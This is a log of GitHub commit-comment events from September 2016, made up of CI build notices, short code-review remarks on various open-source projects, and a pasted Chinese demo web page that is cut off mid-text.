{"id":"4601404117","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127385,"position":null,"line":null,"path":null,"commit_id":"62e2aaa81a45de8a7d0a0bd2a6cf5340df3de245","created_at":"2016-09-22T09:43:56Z","updated_at":"2016-09-22T09:43:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1101](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13875&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T09:43:56Z"}
{"id":"4601405510","type":"CommitCommentEvent","actor":{"login":"olahesoo"},"repo":{"name":"olahesoo/OOPprojekt2016"},"payload":{"comment":{"id":19127391,"position":null,"line":null,"path":null,"commit_id":"6f59cb759a1e8949802554a68585802f36eb8957","created_at":"2016-09-22T09:44:13Z","updated_at":"2016-09-22T09:44:13Z","body":"Can you log the bugs as well? Haven't had the time to test it myself."}},"created_at":"2016-09-22T09:44:13Z"}
{"id":"4601406241","type":"CommitCommentEvent","actor":{"login":"Shivijais"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":19127393,"position":5,"line":181,"path":"js/modules/drilldown.src.js","commit_id":"790324044242398d8067d0539db27837872e5415","created_at":"2016-09-22T09:44:23Z","updated_at":"2016-09-22T09:44:23Z","body":"This line is giving error that `Highcharts is not defined`. Shouldn't we use `H.Color(color).setOpacity(0).get()`?"}},"created_at":"2016-09-22T09:44:23Z"}
{"id":"4601409907","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19127397,"position":44,"line":101,"path":"UM/Settings/Models/InstanceContainersModel.py","commit_id":"2b9a914335f46e52f23a3d07954d103f414c4f59","created_at":"2016-09-22T09:45:09Z","updated_at":"2016-09-22T09:45:09Z","body":"You could just use len(self._filter_dicts) or even self._filter_dicts (empty list also resolves to False)"}},"created_at":"2016-09-22T09:45:09Z"}
{"id":"4601411547","type":"CommitCommentEvent","actor":{"login":"palinek"},"repo":{"name":"pvanek/qlipper"},"payload":{"comment":{"id":19127402,"position":null,"line":null,"path":null,"commit_id":"0862db2ecd029cf3482d05f66efab311b3f3725b","created_at":"2016-09-22T09:45:22Z","updated_at":"2016-09-22T09:45:22Z","body":"Go ahead and share your knowledge ..."}},"created_at":"2016-09-22T09:45:22Z"}
{"id":"4601412806","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127407,"position":null,"line":null,"path":null,"commit_id":"085107be625dcca5bd9d362d0013f42cfc0cad7d","created_at":"2016-09-22T09:45:37Z","updated_at":"2016-09-22T09:45:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1102](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13878&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T09:45:37Z"}
{"id":"4601417482","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19127424,"position":null,"line":null,"path":null,"commit_id":"9df3d60efa063adf509705ab5246fed94d37b780","created_at":"2016-09-22T09:46:33Z","updated_at":"2016-09-22T09:46:33Z","body":"@snicolet It might be useful to put following line on 1340\r\n```if (nextVictim == KING)\r\n    dcCandidates[stm] = 0;```"}},"created_at":"2016-09-22T09:46:33Z"}
{"id":"4601418450","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127429,"position":null,"line":null,"path":null,"commit_id":"62e2aaa81a45de8a7d0a0bd2a6cf5340df3de245","created_at":"2016-09-22T09:46:45Z","updated_at":"2016-09-22T09:46:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1101](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13875&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 137 (new)) Build time: 00:02:49"}},"created_at":"2016-09-22T09:46:45Z"}
{"id":"4601418473","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127430,"position":null,"line":null,"path":null,"commit_id":"dd924cff1fa011610f1f09e526cd02222b92cd62","created_at":"2016-09-22T09:46:45Z","updated_at":"2016-09-22T09:46:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1103](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13881&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T09:46:45Z"}
{"id":"4601418479","type":"CommitCommentEvent","actor":{"login":"blixtra"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127431,"position":4,"line":4,"path":"examples/plugins/http-requests/README.md","commit_id":"be2616ba260f4b5f94e93eabd85a699880129793","created_at":"2016-09-22T09:46:45Z","updated_at":"2016-09-22T09:46:45Z","body":"I'd propose: \"The UI shows the number of requests as a single value and graph which are updated every second."}},"created_at":"2016-09-22T09:46:45Z"}
{"id":"4601420705","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127439,"position":null,"line":null,"path":null,"commit_id":"d96e5dd41751b3254e624f1f56b6372b2c22883b","created_at":"2016-09-22T09:47:14Z","updated_at":"2016-09-22T09:47:14Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1104](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13880&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T09:47:14Z"}
{"id":"4601424233","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127446,"position":null,"line":null,"path":null,"commit_id":"d96e5dd41751b3254e624f1f56b6372b2c22883b","created_at":"2016-09-22T09:48:01Z","updated_at":"2016-09-22T09:48:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1104](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13880&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:47"}},"created_at":"2016-09-22T09:48:01Z"}
{"id":"4601424576","type":"CommitCommentEvent","actor":{"login":"smokku"},"repo":{"name":"jakubnabrdalik/gitkurwa"},"payload":{"comment":{"id":19127448,"position":5,"line":55,"path":"configNSFW_PL","commit_id":"caf39d60b40dc271d55122ede512c33d60f27400","created_at":"2016-09-22T09:48:05Z","updated_at":"2016-09-22T09:48:05Z","body":"Alias jest po polsku a echo po angielsku?"}},"created_at":"2016-09-22T09:48:05Z"}
{"id":"4601424667","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19127449,"position":68,"line":68,"path":"cura/QualityManager.py","commit_id":"90dedc354c4e295e11e1826ff59d988067f2924e","created_at":"2016-09-22T09:48:07Z","updated_at":"2016-09-22T09:48:07Z","body":"Although it will probably not happen, the findind definition containers could return an empty list, in which case this will give an index exception."}},"created_at":"2016-09-22T09:48:07Z"}
{"id":"4601427855","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19127452,"position":null,"line":null,"path":null,"commit_id":"4a7526d49e1b886c0e6d7f016228ca95e7927c56","created_at":"2016-09-22T09:48:49Z","updated_at":"2016-09-22T09:48:49Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Tests Failed (1938 of 2493 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4a7526d49e1b886c0e6d7f016228ca95e7927c56-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4a7526d49e1b886c0e6d7f016228ca95e7927c56-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-77.74%25-red.svg)</a> \n"}},"created_at":"2016-09-22T09:48:49Z"}
{"id":"4601428626","type":"CommitCommentEvent","actor":{"login":"neoxic"},"repo":{"name":"mongodb-labs/mongorover"},"payload":{"comment":{"id":19127454,"position":27,"line":27,"path":"c_wrapper/lua-version-compat.c","commit_id":"5b3817cab10e98e8f489e6126e9a5ce19845960b","created_at":"2016-09-22T09:48:59Z","updated_at":"2016-09-22T09:48:59Z","body":"The above `lua_setglobal()` seems redundant since `luaL_register()` sets a global symbol when provided with a non-null name."}},"created_at":"2016-09-22T09:48:59Z"}
{"id":"4601429104","type":"CommitCommentEvent","actor":{"login":"blixtra"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127455,"position":12,"line":12,"path":"examples/plugins/http-requests/README.md","commit_id":"be2616ba260f4b5f94e93eabd85a699880129793","created_at":"2016-09-22T09:49:06Z","updated_at":"2016-09-22T09:49:06Z","body":"\"*has been* picked up\"... but is \"picked up\" the word you want. I'd probably use \"registered\".\r\n\r\n\"see *the* rectangle in the above figure\""}},"created_at":"2016-09-22T09:49:06Z"}
{"id":"4601429650","type":"CommitCommentEvent","actor":{"login":"m-mokhtari"},"repo":{"name":"gator-life/gator.life"},"payload":{"comment":{"id":19127457,"position":30,"line":24,"path":"src/server/server/frontendstructs.py","commit_id":"84ee7e225e3cb40de773da53847a4b838983a530","created_at":"2016-09-22T09:49:12Z","updated_at":"2016-09-22T09:49:12Z","body":"url_hash and key_urlsafe seem redundant, could we not just use url_hash instead in our url  ? url_hash seems to be an \"url_safe\" aw it is a hex string."}},"created_at":"2016-09-22T09:49:12Z"}
{"id":"4601430333","type":"CommitCommentEvent","actor":{"login":"rob-anderson"},"repo":{"name":"rob-anderson/vim-rubytest"},"payload":{"comment":{"id":19127458,"position":null,"line":null,"path":null,"commit_id":"5d710221be490eff5f7d0103de86966df464ee48","created_at":"2016-09-22T09:49:21Z","updated_at":"2016-09-22T09:49:21Z","body":"I mean, vimux window."}},"created_at":"2016-09-22T09:49:21Z"}
{"id":"4601431120","type":"CommitCommentEvent","actor":{"login":"CristianLema"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":19127463,"position":null,"line":null,"path":null,"commit_id":"dd363f081e9108129ec53119b650e97b7310483d","created_at":"2016-09-22T09:49:32Z","updated_at":"2016-09-22T09:49:32Z","body":"Estiven probando esto nun .jsp:\r\n\r\n`\r\n<%@ page language=\"java\" contentType=\"text/html; charset=ISO-8859-1\"\r\n    pageEncoding=\"ISO-8859-1\"%>\r\n`\r\n`<%@taglib prefix=\"c\" uri=\"http://java.sun.com/jsp/jstl/core\" %>\r\n`\r\n\r\n``<c:set var=\"index\" value=\"\"></c:set>``\r\n...\r\n``<c:set var=\"listarUser\" value=\"\"></c:set>``\r\n\r\n``<c:choose>``\r\n\t``<c:when test=\"${title == \\\"index\\\" }\">``\r\n\t\t``<c:set var=\"index\" value=\"id=\\\"actual\\\"\"></c:set>``\r\n\t``</c:when>``\r\n\t...\r\n\t``<c:when test=\"${title == \\\"listarUsuarios\\\" }\">``\r\n\t\t``<c:set var=\"listarUser\" value=\"id=\\\"actual\\\"\"></c:set>``\r\n\t``</c:when>\t``\r\n``</c:choose>``\r\n\r\n``<c:choose>``\r\n\t``<c:when test=\"${sessionScope.myUser == null }\">``\r\n\t \t``<li><a href=\"index.jsp\" ${index} >Inicio</a></li>``\r\n\t\t...\r\n\t``</c:when>``\r\n\t``<c:otherwise>``\r\n\t``\t<c:when test=\"${myUser.user_tipo == 1}\">``\r\n\t\t\t...\r\n\t\t``</c:when>``\r\n\t\t``<c:when test=\"${myUser.user_tipo == 9}\">``\r\n\t\t\t...\r\n\t``\t</c:when>``\r\n\t\t``<c:otherwise>``\r\n\t\t``\t<li>Usuario non válido</li>``\r\n\t\t``</c:otherwise>``\r\n\t``</c:otherwise>``\r\n``</c:choose>``\r\n\r\n**Pero** di que _La Directiva &lt;%@ page no puede usarse en archivo de tag_\r\n\r\nNon podo utilizar jstl en templates, nin scriptlets"}},"created_at":"2016-09-22T09:49:32Z"}
{"id":"4601434271","type":"CommitCommentEvent","actor":{"login":"blixtra"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127468,"position":29,"line":29,"path":"examples/plugins/http-requests/README.md","commit_id":"be2616ba260f4b5f94e93eabd85a699880129793","created_at":"2016-09-22T09:50:12Z","updated_at":"2016-09-22T09:50:12Z","body":"\"is *sent* by the user\""}},"created_at":"2016-09-22T09:50:12Z"}
{"id":"4601435773","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19127471,"position":105,"line":105,"path":"cura/QualityManager.py","commit_id":"90dedc354c4e295e11e1826ff59d988067f2924e","created_at":"2016-09-22T09:50:32Z","updated_at":"2016-09-22T09:50:32Z","body":"If it can be both a machine & extruder definition, wouldn't it make more sense to rename the param to definition? "}},"created_at":"2016-09-22T09:50:32Z"}
{"id":"4601436947","type":"CommitCommentEvent","actor":{"login":"erikvarga"},"repo":{"name":"erikvarga/gcc"},"payload":{"comment":{"id":19127475,"position":null,"line":null,"path":null,"commit_id":"f854f87640051fc35d06a02283eac46d85af6740","created_at":"2016-09-22T09:50:46Z","updated_at":"2016-09-22T09:50:46Z","body":"Thanks. I only checked the sh.exp and the g++ tests and those didn't catch this, so I thought all was well."}},"created_at":"2016-09-22T09:50:46Z"}
{"id":"4601438717","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19127478,"position":123,"line":123,"path":"cura/QualityManager.py","commit_id":"90dedc354c4e295e11e1826ff59d988067f2924e","created_at":"2016-09-22T09:51:09Z","updated_at":"2016-09-22T09:51:09Z","body":"As before; This check can fail and raise an exception. "}},"created_at":"2016-09-22T09:51:09Z"}
{"id":"4601440478","type":"CommitCommentEvent","actor":{"login":"neoxic"},"repo":{"name":"mongodb-labs/mongorover"},"payload":{"comment":{"id":19127483,"position":37,"line":37,"path":"c_wrapper/lua-version-compat.c","commit_id":"5b3817cab10e98e8f489e6126e9a5ce19845960b","created_at":"2016-09-22T09:51:32Z","updated_at":"2016-09-22T09:51:32Z","body":"The call to `luaopen_base(L)` does not make sense here."}},"created_at":"2016-09-22T09:51:32Z"}
{"id":"4601441193","type":"CommitCommentEvent","actor":{"login":"dkuspawono"},"repo":{"name":"dkuspawono/acer-liquid-community-rom-bugtracker"},"payload":{"comment":{"id":19127484,"position":43,"line":0,"path":"wiki/HowToRootAndFlashLiquidCommunityROM.wiki","commit_id":"edc288cd29537cecba22a799a2dbe81e3938b13e","created_at":"2016-09-22T09:51:42Z","updated_at":"2016-09-22T09:51:42Z","body":"something wrong happened partition2 is not found in sd card.it's no moving the download file&folder by app2sd to sd card .. \n"}},"created_at":"2016-09-22T09:51:42Z"}
{"id":"4601443060","type":"CommitCommentEvent","actor":{"login":"blixtra"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127488,"position":30,"line":30,"path":"examples/plugins/http-requests/README.md","commit_id":"be2616ba260f4b5f94e93eabd85a699880129793","created_at":"2016-09-22T09:52:05Z","updated_at":"2016-09-22T09:52:05Z","body":"*weavescope* should be *Weave Scope* whenever it is used a the name of the product."}},"created_at":"2016-09-22T09:52:05Z"}
{"id":"4601443485","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127490,"position":null,"line":null,"path":null,"commit_id":"085107be625dcca5bd9d362d0013f42cfc0cad7d","created_at":"2016-09-22T09:52:10Z","updated_at":"2016-09-22T09:52:10Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1102](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13878&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 246, ignored: 3 Build time: 00:06:33"}},"created_at":"2016-09-22T09:52:10Z"}
{"id":"4601446973","type":"CommitCommentEvent","actor":{"login":"patou"},"repo":{"name":"angular/angular-fr"},"payload":{"comment":{"id":19127501,"position":null,"line":null,"path":null,"commit_id":"4a3250cf27f8ebfd3e39bbbf59f77db1548402fa","created_at":"2016-09-22T09:52:55Z","updated_at":"2016-09-22T09:52:55Z","body":"Why the English text as been deleted ?"}},"created_at":"2016-09-22T09:52:55Z"}
{"id":"4601449739","type":"CommitCommentEvent","actor":{"login":"yelizariev"},"repo":{"name":"it-projects-llc/odoo-telegram"},"payload":{"comment":{"id":19127507,"position":18,"line":185,"path":"telegram/telegram.py","commit_id":"3513dc511af3602784a296102719678ec8dcc509","created_at":"2016-09-22T09:53:31Z","updated_at":"2016-09-22T09:53:31Z","body":"use name photos\r\n\r\n        for photo in locals_dict['data'].get('photos', []):\r\n            if photo.get('type') == 'file'):\r\n                f = photo['data']\r\n            else:\r\n                # type is 'base64' by default'\r\n                f = StringIO(base64.b64decode(photo['data']))\r\n\r\n            f.name = photo.get('filename', 'item.png')\r\n\r\n            ret['photos'].append({'type': 'base_64', 'file': f})\r\n\r\n        return ret"}},"created_at":"2016-09-22T09:53:31Z"}
{"id":"4601451313","type":"CommitCommentEvent","actor":{"login":"blixtra"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127510,"position":36,"line":36,"path":"examples/plugins/http-requests/README.md","commit_id":"be2616ba260f4b5f94e93eabd85a699880129793","created_at":"2016-09-22T09:53:51Z","updated_at":"2016-09-22T09:53:51Z","body":"\"Below you see the \""}},"created_at":"2016-09-22T09:53:51Z"}
{"id":"4601452210","type":"CommitCommentEvent","actor":{"login":"123Caddy"},"repo":{"name":"123Caddy/sampexp"},"payload":{"comment":{"id":19127512,"position":null,"line":null,"path":null,"commit_id":"e16fa00490c4238c05124807fb4afce7982c7886","created_at":"2016-09-22T09:54:03Z","updated_at":"2016-09-22T09:54:03Z","body":"for test added"}},"created_at":"2016-09-22T09:54:03Z"}
{"id":"4601452936","type":"CommitCommentEvent","actor":{"login":"neoxic"},"repo":{"name":"mongodb-labs/mongorover"},"payload":{"comment":{"id":19127513,"position":32,"line":32,"path":"c_wrapper/lua-version-compat.c","commit_id":"5b3817cab10e98e8f489e6126e9a5ce19845960b","created_at":"2016-09-22T09:54:12Z","updated_at":"2016-09-22T09:54:12Z","body":"It looks like `setfuncs_compat()` and `newlib_compat()` should be optimized into one function because they are called in tandem and have the same signature."}},"created_at":"2016-09-22T09:54:12Z"}
{"id":"4601454152","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19127517,"position":null,"line":null,"path":null,"commit_id":"4a7526d49e1b886c0e6d7f016228ca95e7927c56","created_at":"2016-09-22T09:54:27Z","updated_at":"2016-09-22T09:54:27Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4a7526d49e1b886c0e6d7f016228ca95e7927c56-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-22T09:54:27Z"}
{"id":"4601454551","type":"CommitCommentEvent","actor":{"login":"yelizariev"},"repo":{"name":"it-projects-llc/odoo-telegram"},"payload":{"comment":{"id":19127519,"position":30,"line":35,"path":"telegram_shop/data/command.xml","commit_id":"3513dc511af3602784a296102719678ec8dcc509","created_at":"2016-09-22T09:54:32Z","updated_at":"2016-09-22T09:54:32Z","body":"        data['photos'] = [{'data':product.image}]\r\n"}},"created_at":"2016-09-22T09:54:32Z"}
{"id":"4601456557","type":"CommitCommentEvent","actor":{"login":"blixtra"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127527,"position":53,"line":53,"path":"examples/plugins/http-requests/README.md","commit_id":"be2616ba260f4b5f94e93eabd85a699880129793","created_at":"2016-09-22T09:54:58Z","updated_at":"2016-09-22T09:54:58Z","body":"Actually, I'd call these *sections* not parts ~~parts~~."}},"created_at":"2016-09-22T09:54:58Z"}
{"id":"4601457457","type":"CommitCommentEvent","actor":{"login":"yelizariev"},"repo":{"name":"it-projects-llc/odoo-telegram"},"payload":{"comment":{"id":19127529,"position":21,"line":188,"path":"telegram/telegram.py","commit_id":"3513dc511af3602784a296102719678ec8dcc509","created_at":"2016-09-22T09:55:08Z","updated_at":"2016-09-22T09:55:08Z","body":"            ret['photos'].append({''file': f})\r\n"}},"created_at":"2016-09-22T09:55:08Z"}
{"id":"4601459275","type":"CommitCommentEvent","actor":{"login":"learnpace"},"repo":{"name":"EdmondFrank/Esurfing"},"payload":{"comment":{"id":19127533,"position":null,"line":null,"path":null,"commit_id":"7b9eb13f361b83f23a354ca43e0867abad19b24d","created_at":"2016-09-22T09:55:29Z","updated_at":"2016-09-22T09:55:29Z","body":"我们学校刚用的天翼，并不能看到nasip，怎么破"}},"created_at":"2016-09-22T09:55:29Z"}
{"id":"4601459970","type":"CommitCommentEvent","actor":{"login":"m-mokhtari"},"repo":{"name":"gator-life/gator.life"},"payload":{"comment":{"id":19127540,"position":null,"line":null,"path":null,"commit_id":"123efbcd8035db0c41b4593718bdbd883b5a50e9","created_at":"2016-09-22T09:55:39Z","updated_at":"2016-09-22T09:55:39Z","body":"It seems that resources/trained_topic_model/lda.mod.state has not been pushed on git-lfs but in git repo instead. Not sure but in this commit other files appears as a metadata file containing git-lfs informations, lda.mod.state appears as a \"binary file\"."}},"created_at":"2016-09-22T09:55:39Z"}
{"id":"4601460788","type":"CommitCommentEvent","actor":{"login":"jfmengels"},"repo":{"name":"zeit/hyperterm"},"payload":{"comment":{"id":19127544,"position":38,"line":82,"path":"lib/reducers/ui.js","commit_id":"8a8fdacffe370ca0e267a7cffbff6734bef43036","created_at":"2016-09-22T09:55:48Z","updated_at":"2016-09-22T09:55:48Z","body":"Either that or you put `{ }` around the case body\r\n```js\r\ncase CONFIG_RELOAD: {\r\n  // foo\r\n}\r\n```\r\nBut I agree that the content should probably be moved to a different function as it's a pretty big body."}},"created_at":"2016-09-22T09:55:48Z"}
{"id":"4601461407","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19127551,"position":156,"line":734,"path":"cura/Settings/ContainerManager.py","commit_id":"90dedc354c4e295e11e1826ff59d988067f2924e","created_at":"2016-09-22T09:55:57Z","updated_at":"2016-09-22T09:55:57Z","body":"You shouldn't thouch those protected parts. "}},"created_at":"2016-09-22T09:55:57Z"}
{"id":"4601461853","type":"CommitCommentEvent","actor":{"login":"manyanzhe"},"repo":{"name":"manyanzhe/text"},"payload":{"comment":{"id":19127552,"position":null,"line":null,"path":null,"commit_id":"e12067370dd6c009a27e20034884f71b5e50d706","created_at":"2016-09-22T09:56:02Z","updated_at":"2016-09-22T09:56:02Z","body":"<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0Transitional//EN\"\"http://www.w3.org/TR/xhtm11/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">\r\n<title>Demo</title>\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"css/base.css\" />\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"css/zxx.css\" />\r\n<link rel=\"stylesheet\" type=\"text/css\" media=\"screen and (min-width:1024px) and (max-width: 1359px)\" href=\"css/md.css\"/>\r\n<link rel=\"stylesheet\" type=\"text/css\" media=\"screen and (min-width:769px) and (max-width: 1023px)\" href=\"css/sm.css\"/>\r\n<link rel=\"stylesheet\" type=\"text/css\" media=\"screen and (max-width: 768px)\" href=\"css/xs.css\"/>\r\n<script src=\"http://libs.baidu.com/jquery/2.0.0/jquery.min.js\"></script>\r\n<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css\">\r\n<script src=\"js/index.js\"></script>\r\n<script src=\"js/wow.min.js\"></script>\r\n</head>\r\n<body >\r\n<div id=\"nav\">\r\n\t<div id=\"navmenu\">\r\n\t\t<ul id=\"navul\">\r\n\t\t\t<li class=\"navactive\"><a href=\"index.html\">网站首页</a></li>\r\n\t\t\t<li><a href=\"grrz.html\">个人日志</a></li>\r\n\t\t\t<li><a href=\"javascript:;\">最新消息</a></li>\r\n\t\t\t<li><a href=\"study.html\">在线学习</a></li>\r\n\t\t\t<li><a href=\"qdzl.html\">前端之旅</a></li>\r\n\t\t\t<li><a href=\"#\">加入我们</a></li>\r\n\t\t</ul>\r\n\t\t<div id=\"loginbar\">\r\n\t\t\t<a id=\"logobarbtn\" href=\"#\">登录</a>\r\n\t\t\t<a id=\"regsiter\" href=\"#\">注册</a>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n\r\n<div class=\"banner\">\r\n\t<img src=\"images/banner2.jpg\" alt=\"图片\" width=\"100%\"/>\r\n</div>\r\n<div class=\"clear\"></div>\r\n<!-- 登录框 star -->\r\n<div id=\"mask\"></div>\r\n<div id=\"loginalert\">\r\n\t<div id=\"loginbox\">\r\n\t\t<h3>会员登录</h3>\r\n\t\t<span id=\"closebox\"></span>\r\n\t</div>\r\n\t<form action=\"\" method=\"post\" id=\"login_form\">\r\n        <div class=\"logininput\">\r\n          <input type=\"text\" name=\"username\" class=\"loginusername\" placeholder=\"请输入您的账号\" />\r\n          <input type=\"password\" name=\"password\" class=\"loginuserpasswordt\" placeholder=\"请输入您的密码\" />\r\n        </div>\r\n        <div class=\"loginbtn\">\r\n          \r\n          <div class=\"logcheckbox fl\">\r\n            保持登录</div>\r\n          <div class=\"fr\"><a href=\"wjmm.html\" target=\"_blank\">忘记密码?</a></div>\r\n          <div class=\"clear\"></div>\r\n          <div class=\"loginsubmit fl\">\r\n            <input type=\"submit\" value=\"登录\" />\r\n          </div>\r\n        </div>\r\n      </form>\r\n      <div>\r\n      <span class=\"loginspeed\">可以使用以下方式快速登录</span>\r\n      <a  id=\"weixin\" href=\"#\"></a>\r\n      <a id=\"weibo\" href=\"#\"></a>\r\n       <a id=\"qq\" href=\"#\"></a>\r\n       </div>\r\n</div>\r\n<!-- 登录框 end-->\r\n\r\n<!-- 注册账号 star -->\r\n<div id=\"regsiteralert\">\r\n\t<div id=\"regsiterbox\">\r\n\t\t<h3>账号注册</h3>\r\n\t\t<span id=\"closetow\"></span>\r\n\t</div>\r\n\t<div class=\"regsiterinput\">\r\n\t\t<div class=\"post_regsiter\">\r\n\t\t\t<span>账号：</span><input type=\"text\" name=\"username\"  placeholder=\"请输入您的账号\" />\r\n\t\t</div>\r\n\t\t<div class=\"post_regsiter\">\r\n\t\t\t<span>密码：</span><input type=\"password\" name=\"password\"  placeholder=\"请输入您的密码\" />\r\n\t\t</div>\r\n\t\t<div class=\"post_regsiter\">\r\n\t\t\t<span>密码：</span><input type=\"password\" name=\"password\" class=\"agin\" placeholder=\"请再次输入您的密码\" />\r\n\t\t</div>\r\n\t\t<div class=\"post_regsiter\" style=\"position:relative;\">\r\n\t\t\t<span>验证码：</span><input type=\"text\" class=\"psd\" placeholder=\"请输入验证码\" />\r\n\t\t\t<input id=\"get\" type=\"submit\" onclick=\"time(this)\" name=\"yt0\" value=\"获取验证码\" id=\"btnnum\">  \r\n\t\t</div>\r\n\t</div>\r\n\t<div class=\"botbtn\">\r\n\t\t <input id=\"regsiterbtn\" type=\"submit\" value=\"确定\" />\r\n\t\t <input id=\"regsiteragin\" type=\"reset\" value=\"重新输入\" />\r\n\t</div>\r\n</div>\r\n<!-- 注册账号 end -->\r\n\r\n<div class=\"new_main\">\r\n\t<div class=\"new_top\">\r\n\t\t<div class=\"new_pic\">\r\n\t\t\t<img src=\"images/1-160116104508-50.jpg\" alt=\"\" width=\"100%\" />\r\n\t\t</div>\r\n\t\t<div class=\"newright\">\r\n\t\t\t<div class=\"newtitle\">\r\n\t\t\t\t<h2 style=\"border-bottom:1px solid #ccc;\">手机APP</h2>\r\n\t\t\t\t<span>时间:2017-2-8</span>\r\n\t\t\t</div>\r\n\t\t\t<div class=\"app\">\r\n\t\t\t\t<div class=\"applogo\">\t</div>\r\n\t\t\t\t<ul>\r\n\t\t\t\t\t<li>大小:5M</li>\r\n\t\t\t\t\t<li>支持系统:IOS,Android</li>\r\n\t\t\t\t\t<li>版本1.0以上</li>\r\n\t\t\t\t</ul>\r\n\t\t\t</div>\r\n\t\t\t<div class=\"info\"><h2>手机APP专场</h2></div>\r\n\t\t\t<div class=\"newcontent\">\r\n\t\t\t\t<p>\r\n\t\t\t\t\t由于iPhone、三星等智能手机的逐步流行和广泛普及，手机app这个词语开始频繁的出现在广大手机网民的视线中。也许你们还不知道什么是手机app，但你一定下载过手机app,你的手机里至少有三个手机app。接下来，珠峰就来帮大家科普一下吧，到底什么是才是手机app呢？   